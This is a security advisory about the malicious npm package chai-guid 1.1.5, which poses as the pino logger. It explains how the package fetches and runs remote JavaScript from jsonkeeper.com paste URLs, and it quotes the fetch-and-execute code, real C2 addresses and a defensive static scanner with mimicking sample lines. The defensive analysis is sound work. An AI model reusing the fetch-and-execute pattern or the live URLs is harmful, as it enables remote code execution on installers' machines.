Malicious package

chai-guid (npm)

Malicious code in chai-guid (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5903
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall chai-guid

What this malware does

chai-guid impersonates the pino logger and the chai-guid chai plugin: the README copies pino badges and pinojs CI links, and index.js exports its middleware as module.exports.pino.

When a consumer calls the exported middleware, index.js spawns lib/caller.js as a detached Node process with stdio ignored. lib/caller.js performs axios.get('https://jsonkeeper.com/b/U2BTS'), reads the .cookie field of the response, and executes it via new Function.constructor('require', s)(require), which runs attacker-controlled JavaScript with full Node privileges and with require injected.

A second, base64-encoded URL (https://jsonkeeper.com/b/XRGF3) is hidden in a fake process.env.DEV_API_KEY shim in lib/caller.js and lib/const.js and serves as a secondary C2 endpoint.

jsonkeeper.com is an anonymous, mutable JSON-paste host: whatever bytes the attacker pastes there will be executed on the installer's machine the moment any consumer invokes the package's middleware.
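A static check for the behaviours described above, for auditing files under node_modules. This is an added example, not the finder's or the publisher's detection code; the PASTE_HOSTS list, the finding names and the sample lines (with a placeholder paste ID) are assumptions constructed for illustration.

```javascript
'use strict';
// Added example. Hosts treated as suspicious fetch targets; jsonkeeper.com comes from the advisory text.
const PASTE_HOSTS = ['jsonkeeper.com'];

function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch { return null; }
}

function isPasteHost(url) {
  const host = hostOf(url);
  return host !== null && PASTE_HOSTS.some((h) => host === h || host.endsWith('.' + h));
}

// Base64-looking tokens that decode to a printable http(s) URL.
function decodedUrls(source) {
  const urls = [];
  for (const m of source.matchAll(/[A-Za-z0-9+/]{16,}={0,2}/g)) {
    const text = Buffer.from(m[0], 'base64').toString('latin1');
    if (/^https?:\/\/[\x21-\x7e]+$/.test(text)) urls.push(text);
  }
  return urls;
}

// Returns a sorted list of finding names for one file's source text.
function scanSource(source) {
  const findings = new Set();
  if (/detached\s*:\s*true/.test(source) && /stdio\s*:\s*['"]ignore['"]/.test(source)) {
    findings.add('detached-silent-child');
  }
  if (/\bnew\s+Function\b|\bFunction\.constructor\b/.test(source)) {
    findings.add('dynamic-code-construction');
  }
  const plain = source.match(/https?:\/\/[^\s'"`)]+/g) || [];
  if (plain.some(isPasteHost)) findings.add('paste-host-url');
  if (decodedUrls(source).some(isPasteHost)) findings.add('encoded-paste-host-url');
  return [...findings].sort();
}

// Constructed sample lines modelled on the behaviour described above (placeholder paste ID).
const encoded = Buffer.from('https://jsonkeeper.com/b/EXAMPLE').toString('base64');
const SUSPECT = [
  "spawn(process.execPath, [script], { detached: true, stdio: 'ignore' });",
  "axios.get('https://jsonkeeper.com/b/EXAMPLE');",
  "new Function.constructor('require', s)(require);",
  `process.env.DEV_API_KEY = '${encoded}';`,
].join('\n');
const BENIGN = "const logger = require('pino')();\nlogger.info('started');";

console.log(scanSource(SUSPECT), scanSource(BENIGN));
```

Each finding is weak on its own (build tools legitimately spawn detached children); the combination of a silent child, runtime code construction and an encoded paste-host URL in one package is what warrants review.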

Malicious versions

1 flagged
1.1.5

Indicators of compromise (SHA-256)

69e9bcacf8dca52aafe4d93019b888c6d32e344b500a21368f036bf586eee161

Frequently asked questions

No. chai-guid on npm has been identified as a malicious package (version 1.1.5 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006791

Credits

  • Amazon Inspector · finder

chai-guid (npm) malicious package — MAL-2026-5903 | O3 Security